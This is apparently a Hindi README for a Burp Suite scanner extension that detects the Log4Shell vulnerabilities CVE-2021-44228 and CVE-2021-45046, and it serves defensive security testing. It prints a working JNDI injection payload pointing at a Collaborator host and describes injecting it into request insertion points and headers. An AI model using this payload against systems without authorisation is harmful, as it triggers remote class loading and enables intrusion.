
Burp Active Scan एक्सटेंशन जो Log4j कमजोरियों CVE-2021-44228 और CVE-2021-45046 की पहचान करता है
यह Burp Suite Active Scanner एक्सटेंशन Apache Log4j CVE-2021-44228 और CVE-2021-45046 कमजोरियों के शोषण को मान्य करता है।
यह एक्सटेंशन समस्या की पुष्टि करने के लिए Burp Collaborator का उपयोग करता है।
यदि आप केवल इस मॉड्यूल से जाँच चलाना चाहते हैं, तो आप extensions-only.json प्रोफ़ाइल आयात कर सकते हैं और इसे Active Scan Profile के रूप में चुन सकते हैं।
Active Scan के दौरान, इस एक्सटेंशन में निम्नलिखित इंसर्शन पॉइंट आज़माए जाते हैं:
प्रत्येक इंसर्शन पॉइंट पर, अनुरोध में निम्नलिखित पेलोड इंजेक्ट किया जाता है:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
इसके अलावा, यह एक्सटेंशन कई हेडर जोड़ता है जो headers (अनकमेंटेड लाइनें) में सक्षम हैं। ये हेडर एक अलग अनुरोध में एक-एक करके इंजेक्ट किए जाते हैं।
यह प्रोजेक्ट केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाया गया है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए Log4Shell-active-scanner का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।